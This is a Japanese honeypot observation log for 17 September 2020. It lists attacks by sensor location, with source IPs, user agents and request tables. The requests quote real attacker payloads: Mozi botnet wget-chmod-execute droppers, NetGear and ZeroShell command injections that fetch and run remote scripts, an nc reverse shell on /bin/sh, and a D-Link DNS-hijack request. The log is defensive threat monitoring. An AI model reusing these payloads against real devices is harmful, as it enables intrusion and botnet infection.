ハニーポット(仮) 観測記録 2020/09/17分です。
特徴
Location:JP
GoAhead IP Cameraの脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
UserAgentがHello, worldであるアクセス
Gh0stRATのような動き
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//115[.]98[.]144[.]77:57903/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:US
GPONルータの脆弱性(CVE-2018-10561)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZeroShell Linux Routerの脆弱性(CVE-2019-12725)を狙うアクセス
D-link製品へDNS hijackingを狙うアクセス
zgrabによるスキャン行為
ZmEuによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//115[.]98[.]181[.]69:39300/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
cd /tmp; rm -rf *; wget http[:]//115[.]99[.]12[.]120:47894/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
cd /tmp; rm -rf *; wget http[:]//27[.]6[.]13[.]218:54465/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:UK
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//116[.]72[.]83[.]20:59457/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:SG
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
XTCによるスキャン行為
XTC BOTNETによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//27[.]5[.]43[.]20:35330/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
他
アクセス数推移
JP:総アクセス数:23 (前日比:-6)
US:総アクセス数:365 (前日比:+213)
UK:総アクセス数:17 (前日比:-126)
SG:総アクセス数:227 (前日比:+71)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 27.5.23.171 | India |
5 | 45.146.164.186 | Russia |
1 | 45.148.10.28 | Italy |
1 | 47.108.25.227 | China |
1 | 60.243.122.77 | India |
1 | 66.240.205.34 | United States |
3 | 89.248.166.183 | Netherlands |
1 | 111.229.240.235 | China |
1 | 115.97.111.58 | India |
1 | 115.98.144.77 | India |
1 | 139.205.177.99 | China |
1 | 180.149.125.171 | Mongolia |
4 | 185.142.236.40 | Netherlands |
1 | 192.241.238.229 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
10 | - |
1 | Hello, world |
1 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488) |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 |
1 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
1 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | Gh0st\xad | ||
1 | GET | /.well-known/security.txt | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /Public/home/appjs/Index.js | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /c/ | HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /ftptest.cgi?loginuse=&loginpas= | HTTP/1.1\n |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /set_ftp.cgi?loginuse=&loginpas=&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+89.248.166.183+1245+-e+%2Fbin%2Fsh%29 | HTTP/1.1\n |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//115[.]97[.]111[.]58:57784/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//115[.]98[.]144[.]77:57903/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
1 | GET | /sitemap.xml | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | login.cgi | HTTP/1.1 |
2 | POST | /HNAP1/ | HTTP/1.0 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /boaform/admin/formLogin | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 27.6.13.218 | India |
1 | 27.7.176.244 | India |
10 | 45.146.164.186 | Russia |
1 | 60.243.231.104 | India |
1 | 62.4.21.162 | France |
26 | 89.248.174.11 | Netherlands |
1 | 101.0.34.245 | India |
12 | 103.141.104.10 | Indonesia |
1 | 115.98.181.69 | India |
1 | 115.99.12.120 | India |
1 | 125.99.244.132 | India |
1 | 167.172.44.231 | United States |
1 | 180.149.125.168 | Mongolia |
305 | 192.19.231.250 | United States |
1 | 192.241.234.4 | United States |
1 | 202.83.44.192 | India |
UserAgent一覧
件数 | UserAgent |
---|---|
320 | - |
1 | Hello, World |
3 | Hello, world |
10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 zgrab/0.x |
26 | ZmEu |
1 | curl/7.58.0 |
1 | gSOAP/2.8 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | %00 | %00 %00/%00 | |
2 | ABCD | / | HTTP/1.1 |
1 | ABCD | ABCD | HTTP/1.1 |
3 | ABCD | HTTP/1.1 | |
1 | BDMT | /index.html | HTTP/6.7 |
2 | CONNECT | HTTP/1.1 | |
1 | GET | /../../../../../../../../../../../ | HTTP/1.1 |
1 | GET | /../../..//index.html | HTTP/1.0 |
1 | GET | /..//index.html | HTTP/1.1 |
1 | GET | /../index.html | |
1 | GET | /../index.html | HTTP/1.1 |
1 | GET | /../index.html | HTTP/6.7 |
1 | GET | /../index.html | HTTP/1.0 |
1 | GET | /.env | HTTP/1.1 |
1 | GET | /////index.html | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /BlackCatCMS/ | HTTP/1.1 |
1 | GET | /Collabtive/ | HTTP/1.1 |
1 | GET | /Concrete5/ | HTTP/1.1 |
1 | GET | /CubeCart/ | HTTP/1.1 |
1 | GET | /DokuWiki/ | HTTP/1.1 |
1 | GET | /GLPI/ | HTTP/1.1 |
1 | GET | /HumHub/ | HTTP/1.1 |
1 | GET | /Joomla/ | HTTP/1.1 |
1 | GET | /MODX/ | HTTP/1.1 |
1 | GET | /MODx/ | HTTP/1.1 |
1 | GET | /Magento/ | HTTP/1.1 |
2 | GET | /MyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /OpenDocMan/ | HTTP/1.1 |
1 | GET | /PHPMYADMIN/scripts/setup.php | HTTP/1.1 |
1 | GET | /PivotX/ | HTTP/1.1 |
1 | GET | /PrestaShop/ | HTTP/1.1 |
1 | GET | /PyroCMS/ | HTTP/1.1 |
1 | GET | /ResourceSpace/ | HTTP/1.1 |
1 | GET | /Serendipity/ | HTTP/1.1 |
1 | GET | /SugarCE/ | HTTP/1.1 |
1 | GET | /TestLink/ | HTTP/1.1 |
1 | GET | /WebCalendar/ | HTTP/1.1 |
1 | GET | /\./index.html | HTTP/6.7 |
1 | GET | /\./index.html | |
2 | GET | /\./index.html | HTTP/1.1 |
1 | GET | /_vti_bin/ | HTTP/1.1 |
1 | GET | /_vti_cnf/ | HTTP/1.1 |
1 | GET | /_vti_log/ | HTTP/1.1 |
1 | GET | /_vti_pvt/ | HTTP/1.1 |
1 | GET | /achievo/ | HTTP/1.1 |
1 | GET | /adaptcms/ | HTTP/1.1 |
1 | GET | /ajaxplorer/ | HTTP/1.1 |
1 | GET | /appRain/ | HTTP/1.1 |
1 | GET | /apprain/ | HTTP/1.1 |
1 | GET | /asp/ | HTTP/1.1 |
1 | GET | /assets/ | HTTP/1.1 |
1 | GET | /assets/images/ | HTTP/1.1 |
1 | GET | /b2evolution/ | HTTP/1.1 |
1 | GET | /bad397 | HTTP/1.1 |
1 | GET | /bad397/ | HTTP/1.1 |
1 | GET | /blackcatcms/ | HTTP/1.1 |
1 | GET | /c/ | HTTP/1.1 |
1 | GET | /cart/ | HTTP/1.1 |
1 | GET | /cerb/ | HTTP/1.1 |
1 | GET | /cgi-bin-sdb/ | HTTP/1.1 |
1 | GET | /cgi-bin/ | HTTP/1.1 |
12 | GET | /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 | HTTP/1.0 |
1 | GET | /cgi/ | HTTP/1.1 |
1 | GET | /cgi_bin/ | HTTP/1.1 |
1 | GET | /cms/ | HTTP/1.1 |
1 | GET | /codoforum/ | HTTP/1.1 |
1 | GET | /collab/ | HTTP/1.1 |
1 | GET | /collaborate/ | HTTP/1.1 |
1 | GET | /collabtive/ | HTTP/1.1 |
1 | GET | /common/ | HTTP/1.1 |
1 | GET | /community/ | HTTP/1.1 |
1 | GET | /concrete5/ | HTTP/1.1 |
1 | GET | /confluence/ | HTTP/1.1 |
1 | GET | /cubecart/ | HTTP/1.1 |
1 | GET | /dapewfnsw1_dyl/ | HTTP/1.1 |
1 | GET | /database/scripts/setup.php | HTTP/1.1 |
1 | GET | /db/scripts/setup.php | HTTP/1.1 |
1 | GET | /dbadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /dnscfg.cgi?dnsPrimary=149.56.152.185&dnsSecondary8.8.4.4&dnsDynamic=0&dnsRefresh=1 | HTTP/1.1 |
1 | GET | /doc/ | HTTP/1.1 |
1 | GET | /doc/packages/ | HTTP/1.1 |
1 | GET | /dokuwiki/ | HTTP/1.1 |
1 | GET | /dolibarr/ | HTTP/1.1 |
1 | GET | /doorgets/ | HTTP/1.1 |
1 | GET | /drupal/ | HTTP/1.1 |
1 | GET | /e107/ | HTTP/1.1 |
1 | GET | /eFront/ | HTTP/1.1 |
1 | GET | /efront/ | HTTP/1.1 |
1 | GET | /f5sqosds8e5h1/ | HTTP/1.1 |
1 | GET | /false_37207 | HTTP/1.1 |
1 | GET | /false_37207/ | HTTP/1.1 |
1 | GET | /fastcgi/ | HTTP/1.1 |
1 | GET | /flyspray/ | HTTP/1.1 |
1 | GET | /forum/ | HTTP/1.1 |
1 | GET | /glpi/ | HTTP/1.1 |
1 | GET | /guia-negocios/ | HTTP/1.1 |
1 | GET | /helpdezk-community/ | HTTP/1.1 |
1 | GET | /helpdezk/ | HTTP/1.1 |
1 | GET | /hrm/ | HTTP/1.1 |
1 | GET | /html/ | HTTP/1.1 |
1 | GET | /humhub/ | HTTP/1.1 |
1 | GET | /icehrm/ | HTTP/1.1 |
1 | GET | /images/ | HTTP/1.1 |
1 | GET | /img/ | HTTP/1.1 |
3 | GET | /index.html | |
17 | GET | /index.html | HTTP/1.1 |
2 | GET | /index.html | HTTP/6.7 |
1 | GET | /index.html | HTTP/0.9 |
1 | GET | /index.html | QUALYS/1.1 |
1 | GET | /index.html | HTTP/rndmmtd |
1 | GET | /index.html | HTTP/1.1rndmmtd |
1 | GET | /index.html | HTTP/6.7rndmmtd |
1 | GET | /index.html | HTTP/0.0 |
4 | GET | /index.html | HTTP/1.0 |
1 | GET | /index.html | HTTP/QUALYS |
2 | GET | /index.html | HTTP/1.2 |
3 | GET | /index.html rndmmtd | |
1 | GET | /index.html.......... | HTTP/6.7 |
1 | GET | /index.html.............. | HTTP/1.1 |
1 | GET | /index.html?advbjhvyivov | HTTP/1.1 |
1 | GET | /index.html?rndmmtd | HTTP/1.1 |
1 | GET | /index.html?test | HTTP/1.1 |
2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
2 | GET | /ivwgzvlg0a/ | HTTP/1.1 |
1 | GET | /j67ud1ohxh591/ | HTTP/1.1 |
1 | GET | /jbyi_0_3_/ | HTTP/1.1 |
1 | GET | /jh_kowsx9x9b/ | HTTP/1.1 |
1 | GET | /joomla/ | HTTP/1.1 |
1 | GET | /khu2f8afsrj/ | HTTP/1.1 |
1 | GET | /liferay/ | HTTP/1.1 |
1 | GET | /login/ | HTTP/1.1 |
1 | GET | /magento/ | HTTP/1.1 |
1 | GET | /mail/ | HTTP/1.1 |
1 | GET | /manager/ | HTTP/1.1 |
1 | GET | /manual/ | HTTP/1.1 |
1 | GET | /manual/images/ | HTTP/1.1 |
1 | GET | /mediawiki/ | HTTP/1.1 |
1 | GET | /microweber/ | HTTP/1.1 |
1 | GET | /modx/ | HTTP/1.1 |
1 | GET | /moodle/ | HTTP/1.1 |
1 | GET | /movabletype/ | HTTP/1.1 |
4 | GET | /mujxpf9qfrie2i5mddq | HTTP/1.1 |
1 | GET | /mujxpf9qfrie2i5mddq | HTTP/6.7 |
1 | GET | /mujxpf9qfrie2i5mddq | HTTP/1.0 |
1 | GET | /mujxpf9qfrie2i5mddq | |
1 | GET | /mujxpf9qfrie2i5mddq/../index.html | HTTP/1.1 |
1 | GET | /my/scripts/setup.php | HTTP/1.1 |
1 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /mybb/ | HTTP/1.1 |
1 | GET | /mysql/scripts/setup.php | HTTP/1.1 |
1 | GET | /mysqladmin/scripts/setup.php | HTTP/1.1 |
2 | GET | /nbr032b_j_l/ | HTTP/1.1 |
1 | GET | /news/ | HTTP/1.1 |
1 | GET | /ob3w_m87j/ | HTTP/1.1 |
1 | GET | /odm/ | HTTP/1.1 |
1 | GET | /ok09pi4y4so/ | HTTP/1.1 |
1 | GET | /ooiqow30sq8m/ | HTTP/1.1 |
1 | GET | /opendocman/ | HTTP/1.1 |
1 | GET | /opensourcepos/ | HTTP/1.1 |
1 | GET | /ownCloud/ | HTTP/1.1 |
1 | GET | /owncloud/ | HTTP/1.1 |
1 | GET | /pHpMyAdMiN/scripts/setup.php | HTTP/1.1 |
1 | GET | /perl/ | HTTP/1.1 |
1 | GET | /php/ | HTTP/1.1 |
1 | GET | /phpAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpBB/ | HTTP/1.1 |
1 | GET | /phpBB3/ | HTTP/1.1 |
1 | GET | /phpMyAdmin-2/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpMyAdmin/ | HTTP/1.1 |
1 | GET | /phpMyAdmin/scripts/db.init.php | HTTP/1.1 |
1 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpbb/ | HTTP/1.1 |
1 | GET | /phpbb3/ | HTTP/1.1 |
1 | GET | /phpgb/ | HTTP/1.1 |
1 | GET | /phpmyadmin/ | HTTP/1.1 |
1 | GET | /phpmyadmin/scripts/db.init.php | HTTP/1.1 |
1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpmyadmin1/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpmyadmin2/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpnuke/ | HTTP/1.1 |
1 | GET | /phpwcms/ | HTTP/1.1 |
1 | GET | /pivotx/ | HTTP/1.1 |
1 | GET | /pligg-cms/ | HTTP/1.1 |
1 | GET | /pligg/ | HTTP/1.1 |
1 | GET | /pma/scripts/setup.php | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /postnuke/ | HTTP/1.1 |
1 | GET | /prestashop/ | HTTP/1.1 |
1 | GET | /project/ | HTTP/1.1 |
1 | GET | /projekt/ | HTTP/1.1 |
1 | GET | /pub/ | HTTP/1.1 |
1 | GET | /pydio/ | HTTP/1.1 |
1 | GET | /pyrocms/ | HTTP/1.1 |
1 | GET | /q9kn5dunk/ | HTTP/1.1 |
1 | GET | /r7ioc58x5gilw/ | HTTP/1.1 |
1 | GET | /recipe/ | HTTP/1.1 |
1 | GET | /recipe/assets/ | HTTP/1.1 |
1 | GET | /recipe/recipe/ | HTTP/1.1 |
1 | GET | /redaxscript/ | HTTP/1.1 |
2 | GET | /rendkaejhlckn8/ | HTTP/1.1 |
1 | GET | /resourcespace/ | HTTP/1.1 |
2 | GET | /rnvtolo9pm/ | HTTP/1.1 |
1 | GET | /samples/ | HTTP/1.1 |
1 | GET | /scripts/ | HTTP/1.1 |
1 | GET | /scripts/setup.php | HTTP/1.1 |
1 | GET | /serendipity/ | HTTP/1.1 |
1 | GET | /servlet/ | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
1 | GET | /setup.php | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//115[.]98[.]181[.]69:39300/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//115[.]99[.]12[.]120:47894/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//27[.]6[.]13[.]218:54465/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
1 | GET | /snzbcxfdhdk/ | HTTP/1.1 |
1 | GET | /social/ | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /spip/ | HTTP/1.1 |
1 | GET | /sqladm/scripts/setup.php | HTTP/1.1 |
1 | GET | /sqladmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /storage/ | HTTP/1.1 |
1 | GET | /sugarce/ | HTTP/1.1 |
1 | GET | /sugarcrm/ | HTTP/1.1 |
1 | GET | /test/ | HTTP/1.1 |
1 | GET | /testlink/ | HTTP/1.1 |
1 | GET | /tikiwiki/ | HTTP/1.1 |
1 | GET | /tv9h3z4t9d/ | HTTP/1.1 |
1 | GET | /twiki/ | HTTP/1.1 |
1 | GET | /typo3/ | HTTP/1.1 |
1 | GET | /typo3/typo3/ | HTTP/1.1 |
1 | GET | /ugi7s50u/ | HTTP/1.1 |
1 | GET | /usemod/ | HTTP/1.1 |
1 | GET | /usr/doc/ | HTTP/1.1 |
1 | GET | /vTigerCRM/ | HTTP/1.1 |
1 | GET | /vcms/ | HTTP/1.1 |
2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /vncviewer.jar | HTTP/1.1 |
1 | GET | /vohthw32/ | HTTP/1.1 |
1 | GET | /vtigercrm/ | HTTP/1.1 |
1 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
1 | GET | /wacko/ | HTTP/1.1 |
1 | GET | /wbce/ | HTTP/1.1 |
1 | GET | /webcalendar/ | HTTP/1.1 |
1 | GET | /webmail/ | HTTP/1.1 |
1 | GET | /wiki/ | HTTP/1.1 |
1 | GET | /wikka/ | HTTP/1.1 |
1 | GET | /wolfcms/ | HTTP/1.1 |
1 | GET | /wordpress/ | HTTP/1.1 |
1 | GET | /wordpress/wp-content/plugins/ | HTTP/1.1 |
1 | GET | /wp-content/plugins/ | HTTP/1.1 |
1 | GET | /wp/ | HTTP/1.1 |
2 | GET | /wrgeu5ecd13va/ | HTTP/1.1 |
1 | GET | /xoops/ | HTTP/1.1 |
1 | GET | /ytnzrxp5b/ | HTTP/1.1 |
1 | GET | /yuy24k3/ | HTTP/1.1 |
1 | GET | /z1c6we9/ | HTTP/1.1 |
2 | GET | /z3n7m2s98gtx1x/ | HTTP/1.1 |
1 | GET | /zen-cart/ | HTTP/1.1 |
1 | GET | /zencart/ | HTTP/1.1 |
2 | GET | HTTP/1.1 | |
2 | GET | http://83[.]118[.]68[.]34.bc.googleusercontent.com:80/index.html | HTTP/1.1 |
1 | GET | http[:]//Qualys[.]null/ | HTTP/1.0 |
1 | GET/index.html | HTTP/1.1 | |
1 | GET/mujxpf9qfrie2i5mddq | HTTP/1.1 | |
1 | HEA | /index.html | HTTP/1.1 |
1 | HEAD | / | HTTP/1.0 |
2 | HEAD | /index.html | HTTP/1.1 |
2 | HEAD | /index.html | HTTP/1.0 |
1 | HEAD | /index.html | |
1 | HEAD | /index.html | HTTP/0.9 |
1 | HEAD | /mujxpf9qfrie2i5mddq | HTTP/1.1 |
1 | HEAD | /mujxpf9qfrie2i5mddq | HTTP/2.0 |
1 | HEAD | /selfupdate/wuident.cab | HTTP/1.0 |
1 | If-Match: | * | |
1 | OPTIONS | / | HTTP/1.1 |
1 | OPTIONS | / | HTTP/1.0 |
2 | OPTIONS | /index.html | HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
3 | POST | /HNAP1/ | HTTP/1.0 |
2 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /index.html | HTTP/1.0 |
1 | POST | /index.html | QUALYS/1.1 |
2 | POST | /index.html | HTTP/1.1 |
1 | POST | /mujxpf9qfrie2i5mddq | HTTP/1.1 |
1 | POST | /mujxpf9qfrie2i5mddq?rndmmtd | HTTP/1.1 |
1 | POST | /sdk/vimService | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
2 | PROPFIND | / | HTTP/1.1 |
2 | QUALYS | / | HTTP/1.1 |
1 | RNDMMTD | /index.html | HTTP/1.0 |
1 | SEARCH | / | HTTP/1.1 |
1 | TRACE | / | HTTP/1.1 |
2 | get | /index.html | HTTP/1.1 |
2 | get | /index.html | HTTP/1.0 |
1 | rndmmtd | / | HTTP/1.1 |
1 | rndmmtd | /index.html | HTTP/1.0 |
1 | rndmmtd | /index.html | HTTP/1.1 |
1 | rndmmtd | /mujxpf9qfrie2i5mddq | HTTP/1.0 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 27.7.30.89 | India |
1 | 45.12.115.130 | France |
8 | 45.146.164.186 | Russia |
1 | 59.30.12.254 | South Korea |
1 | 61.219.11.153 | Taiwan |
1 | 65.52.207.171 | United States |
1 | 116.72.83.20 | India |
1 | 116.75.107.251 | India |
1 | 162.243.128.160 | United States |
1 | 180.149.125.167 | Mongolia |
UserAgent一覧
件数 | UserAgent |
---|---|
5 | - |
1 | Hello, world |
8 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | GET | /.env | HTTP/1.1 |
2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
2 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /c/ | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//116[.]75[.]107[.]251:60565/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//116[.]72[.]83[.]20:59457/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | HEAD | /robots.txt | HTTP/1.0 |
2 | POST | /HNAP1/ | HTTP/1.0 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 1.203.161.58 | China |
1 | 27.5.43.20 | India |
1 | 45.12.115.130 | France |
9 | 45.146.164.186 | Russia |
1 | 45.148.10.28 | Italy |
2 | 87.251.75.254 | Russia |
3 | 89.248.172.90 | Netherlands |
1 | 94.20.64.42 | Azerbaijan |
101 | 121.235.145.234 | China |
1 | 125.82.37.158 | China |
1 | 159.18.94.65 | Canada |
2 | 170.106.38.36 | Singapore |
1 | 180.149.125.166 | Mongolia |
1 | 192.241.215.210 | United States |
101 | 221.227.40.252 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
9 | - |
1 | Hello, world |
202 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
9 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 |
1 | Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729) |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 zgrab/0.x |
1 | XTC |
1 | XTC BOTNET |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
2 | - | ||
2 | \x03 | ||
2 | \x16\x03\x01 | ||
2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
2 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /c/ | HTTP/1.1 |
2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
202 | GET | /phpmyadmin/ | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//27[.]5[.]43[.]20:35330/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | http[:]//httpheader[.]net/azenv.php | HTTP/1.1 |
1 | HEAD | /robots.txt | HTTP/1.0 |
1 | OPTIONS | * | HTTP/1.1 |
1 | POST | /HNAP1/ | HTTP/1.0 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
